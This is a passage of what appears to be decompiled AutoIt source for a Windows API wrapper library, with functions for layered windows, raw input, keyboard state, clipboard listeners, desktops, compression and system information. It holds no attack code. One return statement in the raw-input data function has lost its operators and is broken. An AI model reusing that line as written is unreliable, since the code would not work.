DLLSTRUCTCREATE ($TAGSIZE , DLLSTRUCTGETPTR ($TOBJ , "bmWidth" ) ) $ARET = DLLCALL ("user32.dll" , "bool" , "UpdateLayeredWindow" , "hwnd" , $HWND , "handle" , $HDC , "ptr" , DLLSTRUCTGETPTR ($TPOINT , 3 ) , "struct*" , $TSIZE , "handle" , $HDESTDC , "struct*" , $TPOINT , "dword" , 0 , "struct*" , $TBLENDFUNCTION , "dword" , 2 ) LOCAL $IERROR = @ERROR DLLCALL ("user32.dll" , "bool" , "ReleaseDC" , "hwnd" , $HWND , "handle" , $HDC ) DLLCALL ("gdi32.dll" , "handle" , "SelectObject" , "handle" , $HDESTDC , "handle" , $HDESTSV ) DLLCALL ("gdi32.dll" , "bool" , "DeleteDC" , "handle" , $HDESTDC ) IF $IERROR THEN RETURN SETERROR ($IERROR , 0 , FALSE ) IF $BDELETE THEN DLLCALL ("gdi32.dll" , "bool" , "DeleteObject" , "handle" , $HBITMAP ) ENDIF RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_UPDATELAYEREDWINDOWINDIRECT ($HWND , $TULWINFO ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "UpdateLayeredWindowIndirect" , "hwnd" , $HWND , "struct*" , $TULWINFO ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_WINDOWFROMPOINT (BYREF $TPOINT ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "hwnd" , "WindowFromPoint" , "struct" , $TPOINT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC #EndRegion Public Functions #Region Internal Functions FUNC __ENUMDEFAULTPROC ($PDATA , $LPARAM ) #forceref $lParam LOCAL $ILENGTH = _WINAPI_STRLEN ($PDATA ) __INC ($__G_VENUM ) IF $ILENGTH THEN $__G_VENUM [$__G_VENUM [0 ] ] = DLLSTRUCTGETDATA (DLLSTRUCTCREATE ("wchar[" & ($ILENGTH + 1 ) & "]" , $PDATA ) , 1 ) ELSE $__G_VENUM [$__G_VENUM [0 ] ] = "" ENDIF RETURN 1 ENDFUNC #EndRegion Internal Functions #Region Global Variables and Constants GLOBAL CONST $TAGOSVERSIONINFOEX = $TAGOSVERSIONINFO & ";ushort ServicePackMajor;ushort ServicePackMinor;ushort SuiteMask;byte ProductType;byte Reserved" GLOBAL CONST $TAGRAWINPUTDEVICE = "struct;ushort UsagePage;ushort Usage;dword Flags;hwnd hTarget;endstruct" GLOBAL CONST $TAGRAWINPUTHEADER = "struct;dword Type;dword Size;handle hDevice;wparam wParam;endstruct" GLOBAL CONST $TAGRAWMOUSE = "ushort Flags;ushort Alignment;ushort ButtonFlags;ushort ButtonData;ulong RawButtons;long LastX;long LastY;ulong ExtraInformation;" GLOBAL CONST $TAGRAWKEYBOARD = "ushort MakeCode;ushort Flags;ushort Reserved;ushort VKey;uint Message;ulong ExtraInformation;" GLOBAL CONST $TAGRAWHID = "dword SizeHid;dword Count;" GLOBAL CONST $TAGRAWINPUTMOUSE = $TAGRAWINPUTHEADER & ";" & $TAGRAWMOUSE GLOBAL CONST $TAGRAWINPUTKEYBOARD = $TAGRAWINPUTHEADER & ";" & $TAGRAWKEYBOARD GLOBAL CONST $TAGRAWINPUTHID = $TAGRAWINPUTHEADER & ";" & $TAGRAWHID GLOBAL CONST $TAGRID_DEVICE_INFO_MOUSE = "struct;dword Id;dword NumberOfButtons;dword SampleRate;int HasHorizontalWheel;endstruc" GLOBAL CONST $TAGRID_DEVICE_INFO_KEYBOARD = "struct;dword KbType;dword KbSubType;dword KeyboardMode;dword NumberOfFunctionKeys;dword NumberOfIndicators;dword NumberOfKeysTotal;endstruc" GLOBAL CONST $TAGRID_DEVICE_INFO_HID = "struct;dword VendorId;dword ProductId;dword VersionNumber;ushort UsagePage;ushort Usage;endstruc" GLOBAL CONST $TAGRID_INFO_MOUSE = "dword Size;dword Type;" & $TAGRID_DEVICE_INFO_MOUSE & ";dword Unused[2];" GLOBAL CONST $TAGRID_INFO_KEYBOARD = "dword Size;dword Type;" & $TAGRID_DEVICE_INFO_KEYBOARD GLOBAL CONST $TAGRID_INFO_HID = "dword Size;dword Type;" & $TAGRID_DEVICE_INFO_HID & ";dword Unused[2]" GLOBAL CONST $TAGUSEROBJECTFLAGS = "int Inherit;int Reserved;dword Flags" #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_ACTIVATEKEYBOARDLAYOUT ($HLOCALE , $IFLAG = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "ActivateKeyboardLayout" , "handle" , $HLOCALE , "uint" , $IFLAG ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_ADDCLIPBOARDFORMATLISTENER ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "AddClipboardFormatListener" , "hwnd" , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CALLNEXTHOOKEX ($HHOOK , $ICODE , $WPARAM , $LPARAM ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "lresult" , "CallNextHookEx" , "handle" , $HHOOK , "int" , $ICODE , "wparam" , $WPARAM , "lparam" , $LPARAM ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_CLOSEDESKTOP ($HDESKTOP ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "CloseDesktop" , "handle" , $HDESKTOP ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CLOSEWINDOWSTATION ($HSTATION ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "CloseWindowStation" , "handle" , $HSTATION ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_COMPRESSBUFFER ($PUNCOMPRESSEDBUFFER , $IUNCOMPRESSEDSIZE , $PCOMPRESSEDBUFFER , $ICOMPRESSEDSIZE , $IFORMATANDENGINE = 2 ) LOCAL $ARET , $PWORKSPACE = 0 , $IERROR = 0 DO $ARET = DLLCALL ("ntdll.dll" , "uint" , "RtlGetCompressionWorkSpaceSize" , "ushort" , $IFORMATANDENGINE , "ulong*" , 0 , "ulong*" , 0 ) IF @ERROR OR $ARET [0 ] THEN $IERROR = @ERROR + 20 EXITLOOP ENDIF $PWORKSPACE = __HEAPALLOC ($ARET [2 ] ) IF @ERROR THEN $IERROR = @ERROR + 100 EXITLOOP ENDIF $ARET = DLLCALL ("ntdll.dll" , "uint" , "RtlCompressBuffer" , "ushort" , $IFORMATANDENGINE , "struct*" , $PUNCOMPRESSEDBUFFER , "ulong" , $IUNCOMPRESSEDSIZE , "struct*" , $PCOMPRESSEDBUFFER , "ulong" , $ICOMPRESSEDSIZE , "ulong" , 4096 , "ulong*" , 0 , "ptr" , $PWORKSPACE ) IF @ERROR OR $ARET [0 ] OR NOT $ARET [7 ] THEN $IERROR = @ERROR + 30 EXITLOOP ENDIF UNTIL 1 __HEAPFREE ($PWORKSPACE ) IF $IERROR THEN IF ISARRAY ($ARET ) THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) ELSE RETURN SETERROR ($IERROR , 0 , 0 ) ENDIF ENDIF RETURN $ARET [7 ] ENDFUNC FUNC _WINAPI_COMPUTECRC32 ($PMEMORY , $ILENGTH ) IF _WINAPI_ISBADREADPTR ($PMEMORY , $ILENGTH ) THEN RETURN SETERROR (1 , @EXTENDED , 0 ) LOCAL $ARET = DLLCALL ("ntdll.dll" , "dword" , "RtlComputeCrc32" , "dword" , 0 , "struct*" , $PMEMORY , "int" , $ILENGTH ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CREATEDESKTOP ($SNAME , $IACCESS = 2 , $IFLAGS = 0 , $IHEAP = 0 , $TSECURITY = 0 ) LOCAL $ARET IF $IHEAP THEN $ARET = DLLCALL ("user32.dll" , "handle" , "CreateDesktopExW" , "wstr" , $SNAME , "ptr" , 0 , "ptr" , 0 , "dword" , $IFLAGS , "dword" , $IACCESS , "struct*" , $TSECURITY , "ulong" , $IHEAP , "ptr" , 0 ) ELSE $ARET = DLLCALL ("user32.dll" , "handle" , "CreateDesktopW" , "wstr" , $SNAME , "ptr" , 0 , "ptr" , 0 , "dword" , $IFLAGS , "dword" , $IACCESS , "struct*" , $TSECURITY ) ENDIF IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_CREATEWINDOWSTATION ($SNAME = "" , $IACCESS = 0 , $IFLAGS = 0 , $TSECURITY = 0 ) LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "CreateWindowStationW" , "wstr" , $SNAME , "dword" , $IFLAGS , "dword" , $IACCESS , "struct*" , $TSECURITY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_DECOMPRESSBUFFER ($PUNCOMPRESSEDBUFFER , $IUNCOMPRESSEDSIZE , $PCOMPRESSEDBUFFER , $ICOMPRESSEDSIZE , $IFORMAT = 2 ) LOCAL $ARET = DLLCALL ("ntdll.dll" , "long" , "RtlDecompressBuffer" , "ushort" , $IFORMAT , "struct*" , $PUNCOMPRESSEDBUFFER , "ulong" , $IUNCOMPRESSEDSIZE , "struct*" , $PCOMPRESSEDBUFFER , "ulong" , $ICOMPRESSEDSIZE , "ulong*" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN $ARET [6 ] ENDFUNC FUNC _WINAPI_DEFRAWINPUTPROC ($PARAWINPUT , $IINPUT ) LOCAL $ARET = DLLCALL ("user32.dll" , "lresult" , "DefRawInputProc" , "ptr" , $PARAWINPUT , "int" , $IINPUT , "uint" , DLLSTRUCTGETSIZE (DLLSTRUCTCREATE ($TAGRAWINPUTHEADER ) ) ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN 1 ENDFUNC FUNC _WINAPI_ENUMDESKTOPS ($HSTATION ) IF STRINGCOMPARE (_WINAPI_GETUSEROBJECTINFORMATION ($HSTATION , 3 ) , "WindowStation" ) THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $HENUMPROC = DLLCALLBACKREGISTER ("__EnumDefaultProc" , "bool" , "ptr;lparam" ) DIM $__G_VENUM [101 ] = [0 ] LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "EnumDesktopsW" , "handle" , $HSTATION , "ptr" , DLLCALLBACKGETPTR ($HENUMPROC ) , "lparam" , 0 ) IF @ERROR OR NOT $ARET [0 ] OR NOT $__G_VENUM [0 ] THEN $__G_VENUM = @ERROR + 10 ENDIF DLLCALLBACKFREE ($HENUMPROC ) IF $__G_VENUM THEN RETURN SETERROR ($__G_VENUM , 0 , 0 ) __INC ($__G_VENUM , + 4294967295 ) RETURN $__G_VENUM ENDFUNC FUNC _WINAPI_ENUMDESKTOPWINDOWS ($HDESKTOP , $BVISIBLE = TRUE ) IF STRINGCOMPARE (_WINAPI_GETUSEROBJECTINFORMATION ($HDESKTOP , 3 ) , "Desktop" ) THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $HENUMPROC = DLLCALLBACKREGISTER ("__EnumWindowsProc" , "bool" , "hwnd;lparam" ) DIM $__G_VENUM [101 ] [2 ] = [[0 ] ] LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "EnumDesktopWindows" , "handle" , $HDESKTOP , "ptr" , DLLCALLBACKGETPTR ($HENUMPROC ) , "lparam" , $BVISIBLE ) IF @ERROR OR NOT $ARET [0 ] OR NOT $__G_VENUM [0 ] [0 ] THEN $__G_VENUM = @ERROR + 10 ENDIF DLLCALLBACKFREE ($HENUMPROC ) IF $__G_VENUM THEN RETURN SETERROR ($__G_VENUM , 0 , 0 ) __INC ($__G_VENUM , + 4294967295 ) RETURN $__G_VENUM ENDFUNC FUNC _WINAPI_ENUMPAGEFILES () LOCAL $AINFO = _WINAPI_GETSYSTEMINFO () LOCAL $HENUMPROC = DLLCALLBACKREGISTER ("__EnumPageFilesProc" , "bool" , "lparam;ptr;ptr" ) DIM $__G_VENUM [101 ] [4 ] = [[0 ] ] LOCAL $ARET = DLLCALL (@SYSTEMDIR & "\psapi.dll" , "bool" , "EnumPageFilesW" , "ptr" , DLLCALLBACKGETPTR ($HENUMPROC ) , "lparam" , $AINFO [1 ] ) IF @ERROR OR NOT $ARET [0 ] OR NOT $__G_VENUM [0 ] [0 ] THEN $__G_VENUM = @ERROR + 10 ENDIF DLLCALLBACKFREE ($HENUMPROC ) IF $__G_VENUM THEN RETURN SETERROR ($__G_VENUM , 0 , 0 ) __INC ($__G_VENUM , + 4294967295 ) RETURN $__G_VENUM ENDFUNC FUNC _WINAPI_ENUMRAWINPUTDEVICES () LOCAL CONST $TAGRAWINPUTDEVICELIST = "struct;handle hDevice;dword Type;endstruct" LOCAL $TRIDL , $ILENGTH = DLLSTRUCTGETSIZE (DLLSTRUCTCREATE ($TAGRAWINPUTDEVICELIST ) ) LOCAL $ARET = DLLCALL ("user32.dll" , "uint" , "GetRawInputDeviceList" , "ptr" , 0 , "uint*" , 0 , "uint" , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) IF ($ARET [0 ] = 0xFFFFFFFF ) OR (NOT $ARET [2 ] ) THEN RETURN SETERROR (10 , + 4294967295 , 0 ) LOCAL $TDATA = DLLSTRUCTCREATE ("byte[" & ($ARET [2 ] * $ILENGTH ) & "]" ) LOCAL $PDATA = DLLSTRUCTGETPTR ($TDATA ) IF @ERROR THEN RETURN SETERROR (@ERROR + 20 , 0 , 0 ) $ARET = DLLCALL ("user32.dll" , "uint" , "GetRawInputDeviceList" , "ptr" , $PDATA , "uint*" , $ARET [2 ] , "uint" , $ILENGTH ) IF ($ARET [0 ] = 0xFFFFFFFF ) OR (NOT $ARET [0 ] ) THEN RETURN SETERROR (1 , + 4294967295 , 0 ) LOCAL $ARESULT [$ARET [2 ] + 1 ] [2 ] = [[$ARET [2 ] ] ] FOR $I = 1 TO $ARET [2 ] $TRIDL = DLLSTRUCTCREATE ("ptr;dword" , $PDATA + $ILENGTH * ($I + 4294967295 ) ) FOR $J = 0 TO 1 $ARESULT [$I ] [$J ] = DLLSTRUCTGETDATA ($TRIDL , $J + 1 ) NEXT NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_ENUMWINDOWSTATIONS () LOCAL $HENUMPROC = DLLCALLBACKREGISTER ("__EnumDefaultProc" , "bool" , "ptr;lparam" ) DIM $__G_VENUM [101 ] = [0 ] LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "EnumWindowStationsW" , "ptr" , DLLCALLBACKGETPTR ($HENUMPROC ) , "lparam" , 0 ) IF @ERROR OR NOT $ARET [0 ] OR NOT $__G_VENUM [0 ] THEN $__G_VENUM = @ERROR + 10 ENDIF DLLCALLBACKFREE ($HENUMPROC ) IF $__G_VENUM THEN RETURN SETERROR ($__G_VENUM , 0 , 0 ) __INC ($__G_VENUM , + 4294967295 ) RETURN $__G_VENUM ENDFUNC FUNC _WINAPI_EXPANDENVIRONMENTSTRINGS ($SSTRING ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "dword" , "ExpandEnvironmentStringsW" , "wstr" , $SSTRING , "wstr" , "" , "dword" , 4096 ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN $ARESULT [2 ] ENDFUNC FUNC _WINAPI_GETACTIVEWINDOW () LOCAL $ARET = DLLCALL ("user32.dll" , "hwnd" , "GetActiveWindow" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETASYNCKEYSTATE ($IKEY ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "short" , "GetAsyncKeyState" , "int" , $IKEY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETCLIPBOARDSEQUENCENUMBER () LOCAL $ARET = DLLCALL ("user32.dll" , "dword" , "GetClipboardSequenceNumber" ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETCURRENTHWPROFILE () LOCAL $TAGHW_PROFILE_INFO = "dword DockInfo;wchar szHwProfileGuid[39];wchar szHwProfileName[80]" LOCAL $THWPI = DLLSTRUCTCREATE ($TAGHW_PROFILE_INFO ) LOCAL $ARET = DLLCALL ("advapi32.dll" , "bool" , "GetCurrentHwProfileW" , "struct*" , $THWPI ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ARESULT [3 ] FOR $I = 0 TO 2 $ARESULT [$I ] = DLLSTRUCTGETDATA ($THWPI , $I + 1 ) NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_GETDEFAULTPRINTER () LOCAL $ARET = DLLCALL ("winspool.drv" , "bool" , "GetDefaultPrinterW" , "wstr" , "" , "dword*" , 2048 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF NOT $ARET [0 ] THEN RETURN SETERROR (10 , _WINAPI_GETLASTERROR () , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_GETDLLDIRECTORY () LOCAL $ARET = DLLCALL ("kernel32.dll" , "dword" , "GetDllDirectoryW" , "dword" , 4096 , "wstr" , "" ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_GETEFFECTIVECLIENTRECT ($HWND , $ACTRL , $ISTART = 0 , $IEND = + 4294967295 ) IF NOT ISARRAY ($ACTRL ) THEN LOCAL $ICTRL = $ACTRL DIM $ACTRL [1 ] = [$ICTRL ] $ISTART = 0 $IEND = 0 ENDIF IF __CHECKERRORARRAYBOUNDS ($ACTRL , $ISTART , $IEND ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ICOUNT = $IEND - $ISTART + 1 LOCAL $TCTRL = DLLSTRUCTCREATE ("uint64[" & ($ICOUNT + 2 ) & "]" ) $ICOUNT = 2 FOR $I = $ISTART TO $IEND IF ISHWND ($ACTRL [$I ] ) THEN $ACTRL [$I ] = _WINAPI_GETDLGCTRLID ($ACTRL [$I ] ) ENDIF DLLSTRUCTSETDATA ($TCTRL , 1 , _WINAPI_MAKEQWORD (1 , $ACTRL [$I ] ) , $ICOUNT ) $ICOUNT += 1 NEXT LOCAL $TRECT = DLLSTRUCTCREATE ($TAGRECT ) DLLCALL ("comctl32.dll" , "none" , "GetEffectiveClientRect" , "hwnd" , $HWND , "struct*" , $TRECT , "struct*" , $TCTRL ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $TRECT ENDFUNC FUNC _WINAPI_GETHANDLEINFORMATION ($HOBJECT ) LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "GetHandleInformation" , "handle" , $HOBJECT , "dword*" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_GETIDLETIME () LOCAL $TLASTINPUTINFO = DLLSTRUCTCREATE ("uint;dword" ) DLLSTRUCTSETDATA ($TLASTINPUTINFO , 1 , DLLSTRUCTGETSIZE ($TLASTINPUTINFO ) ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetLastInputInfo" , "struct*" , $TLASTINPUTINFO ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN _WINAPI_GETTICKCOUNT () - DLLSTRUCTGETDATA ($TLASTINPUTINFO , 2 ) ENDFUNC FUNC _WINAPI_GETKEYBOARDLAYOUT ($HWND ) LOCAL $ARET = DLLCALL ("user32.dll" , "dword" , "GetWindowThreadProcessId" , "hwnd" , $HWND , "ptr" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) $ARET = DLLCALL ("user32.dll" , "handle" , "GetKeyboardLayout" , "dword" , $ARET [0 ] ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETKEYBOARDLAYOUTLIST () LOCAL $ARET = DLLCALL ("user32.dll" , "uint" , "GetKeyboardLayoutList" , "int" , 0 , "ptr" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) LOCAL $TDATA = DLLSTRUCTCREATE ("handle[" & $ARET [0 ] & "]" ) $ARET = DLLCALL ("user32.dll" , "uint" , "GetKeyboardLayoutList" , "int" , $ARET [0 ] , "struct*" , $TDATA ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ALIST [$ARET [0 ] + 1 ] = [$ARET [0 ] ] FOR $I = 1 TO $ALIST [0 ] $ALIST [$I ] = DLLSTRUCTGETDATA ($TDATA , 1 , $I ) NEXT RETURN $ALIST ENDFUNC FUNC _WINAPI_GETKEYBOARDSTATE () LOCAL $TDATA = DLLSTRUCTCREATE ("byte[256]" ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "GetKeyboardState" , "struct*" , $TDATA ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN $TDATA ENDFUNC FUNC _WINAPI_GETKEYBOARDTYPE ($ITYPE ) LOCAL $ARET = DLLCALL ("user32.dll" , "int" , "GetKeyboardType" , "int" , $ITYPE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETKEYNAMETEXT ($LPARAM ) LOCAL $ARET = DLLCALL ("user32.dll" , "int" , "GetKeyNameTextW" , "long" , $LPARAM , "wstr" , "" , "int" , 128 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_GETKEYSTATE ($VKEY ) LOCAL $ARET = DLLCALL ("user32.dll" , "short" , "GetKeyState" , "int" , $VKEY ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETMODULEHANDLEEX ($SMODULE , $IFLAGS = 0 ) LOCAL $STYPEOFMODULE = "ptr" IF ISSTRING ($SMODULE ) THEN IF STRINGSTRIPWS ($SMODULE , $STR_STRIPLEADING + $STR_STRIPTRAILING ) THEN $STYPEOFMODULE = "wstr" ELSE $SMODULE = 0 ENDIF ENDIF LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "GetModuleHandleExW" , "dword" , $IFLAGS , $STYPEOFMODULE , $SMODULE , "ptr*" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [3 ] ENDFUNC FUNC _WINAPI_GETMUILANGUAGE () LOCAL $ARET = DLLCALL ("comctl32.dll" , "word" , "GetMUILanguage" ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETPERFORMANCEINFO () LOCAL $TPI = DLLSTRUCTCREATE ("dword;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;ulong_ptr;dword;dword;dword" ) LOCAL $ARET = DLLCALL (@SYSTEMDIR & "\psapi.dll" , "bool" , "GetPerformanceInfo" , "struct*" , $TPI , "dword" , DLLSTRUCTGETSIZE ($TPI ) ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ARESULT [13 ] FOR $I = 0 TO 12 $ARESULT [$I ] = DLLSTRUCTGETDATA ($TPI , $I + 2 ) NEXT FOR $I = 0 TO 8 $ARESULT [$I ] *= $ARESULT [9 ] NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_GETPROCADDRESS ($HMODULE , $VNAME ) LOCAL $STYPE = "str" IF ISNUMBER ($VNAME ) THEN $STYPE = "word" LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "ptr" , "GetProcAddress" , "handle" , $HMODULE , $STYPE , $VNAME ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_GETPHYSICALLYINSTALLEDSYSTEMMEMORY () LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "GetPhysicallyInstalledSystemMemory" , "uint64*" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_GETPROCESSSHUTDOWNPARAMETERS () LOCAL $ARET = DLLCALL ("kernel32.dll" , "bool" , "GetProcessShutdownParameters" , "dword*" , 0 , "dword*" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) RETURN SETEXTENDED (NUMBER (NOT $ARET [2 ] ) , $ARET [1 ] ) ENDFUNC FUNC _WINAPI_GETPROCESSWINDOWSTATION () LOCAL $ARET = DLLCALL ("user32.dll" , "handle" , "GetProcessWindowStation" ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETPWRCAPABILITIES () IF NOT __DLL ("powrprof.dll" ) THEN RETURN SETERROR (103 , 0 , 0 ) LOCAL $TSPC = DLLSTRUCTCREATE ("byte[18];byte[3];byte;byte[8];byte[2];ulong[6];ulong[5]" ) LOCAL $ARET = DLLCALL ("powrprof.dll" , "boolean" , "GetPwrCapabilities" , "struct*" , $TSPC ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $ARESULT [25 ] FOR $I = 0 TO 17 $ARESULT [$I ] = DLLSTRUCTGETDATA ($TSPC , 1 , $I + 1 ) NEXT $ARESULT [18 ] = DLLSTRUCTGETDATA ($TSPC , 3 ) FOR $I = 19 TO 20 $ARESULT [$I ] = DLLSTRUCTGETDATA ($TSPC , 5 , $I + 4294967278 ) NEXT FOR $I = 21 TO 24 $ARESULT [$I ] = DLLSTRUCTGETDATA ($TSPC , 7 , $I + 4294967276 ) NEXT RETURN $ARESULT ENDFUNC FUNC _WINAPI_GETRAWINPUTBUFFER ($PBUFFER , $ILENGTH ) LOCAL $ARET = DLLCALL ("user32.dll" , "uint" , "GetRawInputBuffer" , "struct*" , $PBUFFER , "uint*" , $ILENGTH , "uint" , DLLSTRUCTGETSIZE (DLLSTRUCTCREATE ($TAGRAWINPUTHEADER ) ) ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF ($ARET [0 ] = 0xFFFFFFFF ) OR (NOT $ARET [1 ] ) THEN RETURN SETERROR (10 , + 4294967295 , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_GETRAWINPUTBUFFERLENGTH () LOCAL $ARET = DLLCALL ("user32.dll" , "uint" , "GetRawInputBuffer" , "ptr" , 0 , "uint*" , 0 , "uint" , DLLSTRUCTGETSIZE (DLLSTRUCTCREATE ($TAGRAWINPUTHEADER ) ) ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] = 0xFFFFFFFF THEN RETURN SETERROR (10 , + 4294967295 , 0 ) RETURN $ARET [2 ] * 8 ENDFUNC FUNC _WINAPI_GETRAWINPUTDATA ($HRAWINPUT , $PBUFFER , $ILENGTH , $IFLAG ) LOCAL $ARET = DLLCALL ("user32.dll" , "uint" , "GetRawInputData" , "handle" , $HRAWINPUT , "uint" , $IFLAG , "struct*" , $PBUFFER , "uint*" , $ILENGTH , "uint" , DLLSTRUCTGETSIZE (DLLSTRUCTCREATE ($TAGRAWINPUTHEADER ) ) ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) IF $ARET [0 ] = 0xFFFFFFFF THEN RETURN SETERROR (10 , + 4294967295 , 0 ) RETURN ($ARET [3 ] $ARET [0 ] $ARET [4 ] ) ENDFUNC FUNC _WINAPI_GETRAWINPUTDEVICEINFO ($HDEVICE , $PBUFFER , $ILENGTH , $IFLAG ) LOCAL $ARET = DLLCALL ("user32.dll" , "uint" , "GetRawInputDeviceInfoW" , "handle" , 